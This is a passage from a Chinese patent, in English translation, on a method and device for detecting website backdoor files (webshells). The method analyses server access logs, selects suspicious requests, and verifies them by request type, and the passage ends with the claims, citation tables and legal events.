Embodiment 3
An embodiment of the present invention may provide a computer terminal, which may be any computer terminal in a group of computer terminals. Optionally, in this embodiment, the above computer terminal may also be replaced by a terminal device such as a mobile terminal.
Optionally, in this embodiment, the above computer terminal may be at least one of the multiple network devices of a computer network.
Optionally, Fig. 5 is a structural block diagram of a computer terminal according to an embodiment of the present invention. As shown in Fig. 5, the computer terminal may include one or more processors (only one is shown in the figure) and a memory.
The memory may be used to store software programs and modules, such as the program instructions/modules corresponding to the verification method and device of the website backdoor file in the embodiment of the present invention; the processor runs the software programs and modules stored in the memory to perform various functional applications and data processing, that is, to implement the above verification method of the website backdoor file. The memory may include high-speed random access memory and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory or other non-volatile solid-state memory. In some examples, the memory may further include memory located remotely from the processor, and these remote memories may be connected to the computer terminal through a network. Examples of the above network include, but are not limited to, the internet, an intranet, a local area network, a mobile communication network and combinations thereof.
The processor may call the information and application programs stored in the memory through a transmission device to perform the following steps:
S1: obtain network access log records;
S2: analyse the network access log records according to the communication protocol used to access website backdoor files, and choose the internet access request records to be verified;
S3: choose a verification mode according to the request type to which the internet access request record to be verified belongs;
S4: verify by the chosen verification mode whether the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, the above processor may also execute program code for the following steps: parse all the internet access request records contained in the network access log records one by one, segment by segment, using the communication protocol; determine the internet access request records whose parsed request body content contains the code segment executed by the website backdoor file and/or the fixed field set in the communication protocol as the internet access request records to be verified.
Optionally, the above processor may also execute program code for the following steps: extract the uniform resource locator (URL) from the request line of the internet access request record to be verified; determine the request type according to the suffix portion of the URL; choose a verification mode for the internet access request record to be verified according to the request type.
Optionally, the above processor may also execute program code for the following steps: extract from the internet access request record to be verified the connection password used to access the corresponding file; in the case where the request type is PHP type or ASP type, search the internet access request record to be verified for the executable code section corresponding to the connection password; run the executable code section according to a preset calculation to generate an operation result; when the operation result is consistent with the preset result, determine that the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, the above processor may also execute program code for the following steps: extract from the internet access request record to be verified the connection password used to access the corresponding file; in the case where the request type is JSP type, search the internet access request record to be verified for the executable code section corresponding to the connection password; run the executable code section according to a specified command function to generate a display result; when the display result meets the functional characteristic of the command function, determine that the file accessed by the internet access request record to be verified is a website backdoor file.
Using the embodiment of the present invention, a verification scheme for website backdoor files is provided. The network access log records retained on the server are analysed according to the communication protocol used to access website backdoor files so as to choose the internet access request records to be verified, and a verification mode chosen according to the request type to which the record belongs confirms whether the website backdoor file really exists. This effectively improves the success rate of identifying website backdoor files and significantly reduces the probability of missed or false reports in the verification process, thereby solving the technical problem in the related art that determining website backdoor files by feature matching has relatively low accuracy and is prone to missed or false reports.
Those skilled in the art can understand that the structure shown in Fig. 5 is only illustrative; the computer terminal may also be a smartphone (such as an Android phone or an iOS phone), a tablet computer, a palmtop computer, a mobile internet device (MID), a PAD or another terminal device. Fig. 5 does not limit the structure of the above electronic apparatus. For example, the computer terminal may also include more or fewer components (such as a network interface or display device) than shown in Fig. 5, or have a configuration different from that shown in Fig. 5.
One of ordinary skill in the art can understand that all or part of the steps in the various methods of the above embodiments can be completed by a program instructing the hardware related to the terminal device; the program can be stored in a computer-readable storage medium, and the storage medium may include a flash disk, read-only memory (ROM), random access memory (RAM), a magnetic disk or an optical disk, etc.
Embodiment 4
An embodiment of the present invention also provides a storage medium. Optionally, in this embodiment, the above storage medium may be used to save the program code executed by the verification method of the website backdoor file provided in embodiment one above.
Optionally, in this embodiment, the above storage medium may be located in any computer terminal of a group of computer terminals in a computer network, or in any mobile terminal of a group of mobile terminals.
Optionally, in this embodiment, the storage medium is configured to store program code for performing the following steps:
S1: obtain network access log records;
S2: analyse the network access log records according to the communication protocol used to access website backdoor files, and choose the internet access request records to be verified;
S3: choose a verification mode according to the request type to which the internet access request record to be verified belongs;
S4: determine by the chosen verification mode whether the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, in this embodiment, the storage medium is also configured to store program code for performing the following steps: parse all the internet access request records contained in the network access log records one by one, segment by segment, using the communication protocol; determine the internet access request records whose parsed request body content contains the code segment executed by the website backdoor file and/or the fixed field set in the communication protocol as the internet access request records to be verified.
Optionally, in this embodiment, the storage medium is also configured to store program code for performing the following steps: extract the uniform resource locator (URL) from the request line of the internet access request record to be verified; determine the request type according to the suffix portion of the URL; choose a verification mode for the internet access request record to be verified according to the request type.
Optionally, in this embodiment, the storage medium is also configured to store program code for performing the following steps: extract from the internet access request record to be verified the connection password used to access the corresponding file; in the case where the request type is PHP type or ASP type, search the internet access request record to be verified for the executable code section corresponding to the connection password; run the executable code section according to a preset calculation to generate an operation result; when the operation result is consistent with the preset result, determine that the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, in this embodiment, the storage medium is also configured to store program code for performing the following steps: extract from the internet access request record to be verified the connection password used to access the corresponding file; in the case where the request type is JSP type, search the internet access request record to be verified for the executable code section corresponding to the connection password; run the executable code section according to a specified command function to generate a display result; when the display result meets the functional characteristic of the command function, determine that the file accessed by the internet access request record to be verified is a website backdoor file.
The serial numbers of the embodiments of the present invention are for description only and do not represent the merits of the embodiments.
In the above embodiments of the present invention, the description of each embodiment has its own emphasis; for parts not described in detail in one embodiment, refer to the related description of the other embodiments.
In the several embodiments provided in this application, it should be understood that the disclosed technical content may be implemented in other ways. The device embodiments described above are only illustrative; for example, the division of the units is only a division by logical function, and there may be other ways of division in actual implementation: multiple units or components may be combined or integrated into another system, or some features may be ignored or not executed. Furthermore, the mutual coupling, direct coupling or communication connection shown or discussed may be an indirect coupling or communication connection through some interfaces, units or modules, and may be electrical or of another form.
The units described as separate components may or may not be physically separate, and the components shown as units may or may not be physical units; they may be located in one place or distributed over multiple network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, the functional units in each embodiment of the present invention may be integrated in one processing unit, or each unit may exist physically alone, or two or more units may be integrated in one unit. The above integrated unit may be implemented in the form of hardware or in the form of a software functional unit.
If the integrated unit is implemented in the form of a software functional unit and sold or used as an independent product, it may be stored in a computer-readable storage medium. Based on this understanding, the technical solution of the present invention, in essence, the part contributing to the prior art, or all or part of the technical solution, may be embodied in the form of a software product stored in a storage medium that includes instructions to cause a computer device (which may be a personal computer, server or network device) to perform all or part of the steps of the method described in each embodiment of the present invention. The foregoing storage medium includes a USB flash disk, read-only memory (ROM), random access memory (RAM), a removable hard disk, a magnetic disk, an optical disk or any other medium that can store program code.
The above is only the preferred embodiment of the present invention. It should be noted that those of ordinary skill in the art may make several improvements and modifications without departing from the principles of the present invention, and these improvements and modifications should also be regarded as within the protection scope of the present invention.
Claims (10)
1. A verification method of a website backdoor file, characterised by including:
obtaining network access log records;
analysing the network access log records according to the communication protocol used to access the website backdoor file, and choosing the internet access request record to be verified;
choosing a verification mode according to the request type to which the internet access request record to be verified belongs;
verifying by the chosen verification mode whether the file accessed by the internet access request record to be verified is the website backdoor file.
2. The method according to claim 1, characterised in that analysing the network access log records according to the communication protocol used to access the website backdoor file and selecting the Internet access request records to be verified comprises:
parsing, one by one and segment by segment, all the Internet access request records contained in the network access log records using the communication protocol;
determining as the Internet access request records to be verified those records whose parsed request body content contains a code segment executed by the website backdoor file and/or a fixed field set in the communication protocol.
3. The method according to claim 1, characterised in that selecting the verification mode according to the request type to which the Internet access request record to be verified belongs comprises:
extracting a uniform resource locator (URL) from the request line of the Internet access request record to be verified;
determining the request type according to the suffix portion of the URL;
selecting the verification mode for the Internet access request record to be verified according to the request type.
4. The method according to claim 1 or 3, characterised in that verifying by the verification mode whether the file accessed by the Internet access request record to be verified is the website backdoor file comprises:
extracting, from the Internet access request record to be verified, the connection password used to access the corresponding file;
when the request type is the PHP type or the ASP type, looking up in the Internet access request record to be verified the executable code segment corresponding to the connection password;
running the executable code segment according to a preset calculation to generate an operation result;
when the operation result is consistent with a preset result, determining that the file accessed by the Internet access request record to be verified is the website backdoor file.
5. The method according to claim 1 or 3, characterised in that verifying by the verification mode whether the file accessed by the Internet access request record to be verified is the website backdoor file comprises:
extracting, from the Internet access request record to be verified, the connection password used to access the corresponding file;
when the request type is the JSP type, looking up in the Internet access request record to be verified the executable code segment corresponding to the connection password;
running the executable code segment according to a specified command function to generate a display result;
when the display result conforms to the functional characteristics of the command function, determining that the file accessed by the Internet access request record to be verified is the website backdoor file.
6. A verification device for a website backdoor file, characterised in that it comprises:
an acquisition module for obtaining network access log records;
an analysis module for analysing the network access log records according to the communication protocol used to access the website backdoor file and selecting Internet access request records to be verified;
a selection module for selecting a verification mode according to the request type to which the Internet access request record to be verified belongs;
a verification module for verifying, by the selected verification mode, whether the file accessed by the Internet access request record to be verified is the website backdoor file.
7. The device according to claim 6, characterised in that the analysis module comprises:
a parsing unit for parsing, one by one and segment by segment, all the Internet access request records contained in the network access log records using the communication protocol;
a first determining unit for determining as the Internet access request records to be verified those records whose parsed request body content contains a code segment executed by the website backdoor file and/or a fixed field set in the communication protocol.
8. The device according to claim 6, characterised in that the selection module comprises:
a first extraction unit for extracting a uniform resource locator (URL) from the request line of the Internet access request record to be verified;
a second determining unit for determining the request type according to the suffix portion of the URL;
a selection unit for selecting the verification mode for the Internet access request record to be verified according to the request type.
9. The device according to claim 6 or 8, characterised in that the verification module comprises:
a second extraction unit for extracting, from the Internet access request record to be verified, the connection password used to access the corresponding file;
a lookup unit for looking up, when the request type is the PHP type or the ASP type, the executable code segment corresponding to the connection password in the Internet access request record to be verified;
a generation unit for running the executable code segment according to a preset calculation to generate an operation result;
a third determining unit for determining, when the operation result is consistent with a preset result, that the file accessed by the Internet access request record to be verified is the website backdoor file.
10. The device according to claim 6 or 8, characterised in that the verification module comprises:
a second extraction unit for extracting, from the Internet access request record to be verified, the connection password used to access the corresponding file;
a lookup unit for looking up, when the request type is the JSP type, the executable code segment corresponding to the connection password in the Internet access request record to be verified;
a generation unit for running the executable code segment according to a specified command function to generate a display result;
a third determining unit for determining, when the display result conforms to the functional characteristics of the command function, that the file accessed by the Internet access request record to be verified is the website backdoor file.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201610096648.2A CN107104924B (en) | 2016-02-22 | 2016-02-22 | Verification method and device for website backdoor file |
Publications (2)
Publication Number | Publication Date |
---|---|
CN107104924A true CN107104924A (en) | 2017-08-29 |
CN107104924B CN107104924B (en) | 2020-10-09 |
Family
ID=59658691
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201610096648.2A Active CN107104924B (en) | 2016-02-22 | 2016-02-22 | Verification method and device for website backdoor file |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN107104924B (en) |
Citations (5)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US20120005743A1 (en) * | 2010-06-30 | 2012-01-05 | Mitsubishi Electric Corporation | Internal network management system, internal network management method, and program |
CN102426634A (en) * | 2011-10-26 | 2012-04-25 | 中国信息安全测评中心 | Method for finding back door of source code |
US20150256551A1 (en) * | 2012-10-05 | 2015-09-10 | Myoung Hun Kang | Log analysis system and log analysis method for security system |
CN105069355A (en) * | 2015-08-26 | 2015-11-18 | 厦门市美亚柏科信息股份有限公司 | Static detection method and apparatus for webshell deformation |
CN105302707A (en) * | 2014-06-06 | 2016-02-03 | 腾讯科技(深圳)有限公司 | Application vulnerability detection method and apparatus |
Non-Patent Citations (1)
Title |
---|
石刘洋: "基于web日志的webshell检测方法研究", 《信息安全研究》 * |
Cited By (14)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN107911355B (en) * | 2017-11-07 | 2020-05-01 | 杭州安恒信息技术股份有限公司 | Website backdoor utilization event identification method based on attack chain |
CN107911355A (en) * | 2017-11-07 | 2018-04-13 | 杭州安恒信息技术有限公司 | A kind of website back door based on attack chain utilizes event recognition method |
CN109040071B (en) * | 2018-08-06 | 2021-02-09 | 杭州安恒信息技术股份有限公司 | Method for confirming WEB backdoor attack event |
CN109040071A (en) * | 2018-08-06 | 2018-12-18 | 杭州安恒信息技术股份有限公司 | A kind of confirmation method of WEB backdoor attack event |
CN110868410A (en) * | 2019-11-11 | 2020-03-06 | 恒安嘉新(北京)科技股份公司 | Method and device for acquiring webpage Trojan horse connection password, electronic equipment and storage medium |
CN110868410B (en) * | 2019-11-11 | 2022-05-10 | 恒安嘉新(北京)科技股份公司 | Method and device for acquiring webpage Trojan horse connection password, electronic equipment and storage medium |
CN114006706A (en) * | 2020-07-13 | 2022-02-01 | 深信服科技股份有限公司 | Network security detection method, system, computer device and readable storage medium |
CN112073418A (en) * | 2020-09-10 | 2020-12-11 | 北京微步在线科技有限公司 | Encrypted flow detection method and device and computer readable storage medium |
CN112073418B (en) * | 2020-09-10 | 2022-01-14 | 北京微步在线科技有限公司 | Encrypted flow detection method and device and computer readable storage medium |
CN112182561A (en) * | 2020-09-24 | 2021-01-05 | 百度在线网络技术(北京)有限公司 | Method and device for detecting rear door, electronic equipment and medium |
CN112182561B (en) * | 2020-09-24 | 2024-04-30 | 百度在线网络技术(北京)有限公司 | Rear door detection method and device, electronic equipment and medium |
CN113225357A (en) * | 2021-07-08 | 2021-08-06 | 北京搜狐新媒体信息技术有限公司 | Evidence obtaining method and related device for webpage backdoor |
CN113722639A (en) * | 2021-08-25 | 2021-11-30 | 北京奇艺世纪科技有限公司 | Website access verification method and device, electronic equipment and readable storage medium |
CN113722639B (en) * | 2021-08-25 | 2023-08-25 | 北京奇艺世纪科技有限公司 | Website access verification method, device, electronic equipment and readable storage medium |
Also Published As
Publication number | Publication date |
---|---|
CN107104924B (en) | 2020-10-09 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
CN107104924A (en) | The verification method and device of website backdoor file | |
CN103607385B (en) | Method and apparatus for security detection based on browser | |
CN103944890B (en) | Virtual interaction system based on customer end/server mode and method | |
CN104468592B (en) | Login method and login system | |
US9264435B2 (en) | Apparatus and methods for access solutions to wireless and wired networks | |
US7293281B1 (en) | Method and system for verifying a client request | |
CN104519050B (en) | Login method and login system | |
CN107016074B (en) | Webpage loading method and device | |
CN102591889A (en) | Method and device for assisting user input based on browser of mobile terminal | |
CN106453216A (en) | Malicious website interception method, malicious website interception device and client | |
CN105939326A (en) | Message processing method and device | |
CN105553999B (en) | Application user behavioural analysis and method of controlling security and its corresponding device | |
CN108696490A (en) | The recognition methods of account permission and device | |
CN106453266A (en) | Abnormal networking request detection method and apparatus | |
CN105302707B (en) | The leak detection method and device of application program | |
CN108810896A (en) | The connection authentication method and device of wireless access point | |
CN105306414A (en) | Port vulnerability detection method, device and system | |
CN103444215A (en) | Methods and apparatuses for avoiding damage in network attacks | |
CN103647652B (en) | A kind of method for realizing data transfer, device and server | |
Kaur et al. | Browser fingerprinting as user tracking technology | |
CN108259457A (en) | A kind of WEB authentication methods and device | |
CN103634111B (en) | Single-point logging method and system and single sign-on client-side | |
CN107332804A (en) | The detection method and device of webpage leak | |
CN105554136B (en) | Backup Data restoring method, apparatus and system | |
CN108924159A (en) | The verification method and device in a kind of message characteristic identification library |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||